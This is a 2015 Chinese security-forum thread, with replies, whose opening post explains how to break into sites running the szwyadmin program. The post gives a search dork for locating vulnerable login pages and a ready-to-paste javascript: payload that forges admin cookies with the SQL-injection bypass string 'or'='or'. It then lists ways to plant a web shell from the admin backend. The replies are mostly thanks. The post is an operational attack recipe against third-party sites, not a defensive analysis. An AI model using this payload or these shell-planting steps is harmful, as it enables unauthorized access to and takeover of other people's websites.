查看: 48153|回复: 169

szwyadmin程序cookies欺骗漏洞拿shell

[复制链接]
  • TA的每日心情
    奋斗
    2016-2-13 17:46
  • 签到天数: 14 天

    [LV.3]偶尔看看II

    发表于 2015-6-25 16:40:13 | 显示全部楼层 |阅读模式
    关键字:inurl:szwyadmin/login.asp
    任意打开一个搜索结果,打开登录界面后在地址栏中输入下面的代码:
    javascript:alert(document.cookie="adminuser="+escape("'or'='or'")); alert(document.cookie="adminpass="+escape("'or'='or'")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp";

    后台拿 shell 的方法:
    1、数据库备份拿shell
    2、直接改配置之后,上传shell文件(成功极少)
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2017-9-11 15:40
  • 签到天数: 425 天

    [LV.9]以坛为家II

    发表于 2015-6-25 19:59:38 | 显示全部楼层
    这个说白了,就是登陆注入,只是把post方式转换成cookie注入

    点评

    做个详细解释把,么么哒  详情 回复 发表于 2015-6-28 04:08
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 06:09:27 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-4-9 19:10
  • 签到天数: 149 天

    [LV.7]常住居民III

    发表于 2015-6-27 22:22:05 | 显示全部楼层
    不错         
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 23:36:16 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 01:05:28 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 01:50:03 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 02:39:38 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-7-28 12:00
  • 签到天数: 22 天

    [LV.4]偶尔看看III

    发表于 2015-6-28 04:08:37 | 显示全部楼层
    wuyan 发表于 2015-6-25 19:59
    这个说白了,就是登陆注入,只是把post方式转换成cookie注入

    做个详细解释把,么么哒
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 16:37:00 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 16:17 , Processed in 0.060946 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部